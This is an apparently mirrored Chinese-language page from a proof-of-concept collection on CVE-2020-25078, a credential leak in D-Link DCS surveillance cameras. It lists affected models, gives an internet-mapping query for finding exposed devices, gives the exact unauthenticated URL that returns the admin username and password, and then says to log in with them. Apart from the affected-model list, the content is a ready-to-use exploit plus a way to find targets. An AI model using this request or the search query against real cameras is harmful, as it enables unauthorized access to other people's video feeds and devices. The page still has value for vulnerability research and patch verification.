mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-07 20:06:03 +00:00
48 lines
690 B
Markdown
48 lines
690 B
Markdown
|
# D-Link DCS系列监控 账号密码信息泄露漏洞 CVE-2020-25078
|
|||
|
|
|
|||
|
|
## 漏洞描述
|
|||
|
|
|
|||
|
|
D-Link DCS系列监控 通过访问特定的URL得到账号密码信息,攻击者通过漏洞进入后台可以获取视频监控页面
|
|||
|
|
|
|||
|
|
## 漏洞影响
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
DCS-2530L
|
|||
|
|
DCS-2670L
|
|||
|
|
DCS-4603
|
|||
|
|
DCS-4622
|
|||
|
|
DCS-4701E
|
|||
|
|
DCS-4703E
|
|||
|
|
DCS-4705E
|
|||
|
|
DCS-4802E
|
|||
|
|
DCS-P703
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
## 网络测绘
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
app="D_Link-DCS-2530L"
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
## 漏洞复现
|
|||
|
|
|
|||
|
|
访问登录页面如下
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
出现漏洞的 Url 为, 其中泄露了账号密码
|
|||
|
|
|
|||
|
|
```plain
|
|||
|
|
http://xxx.xxx.xxx.xxx/config/getuser?index=0
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
使用泄露的账号密码登陆系统
|
|||
|
|
|
|||
|
|
|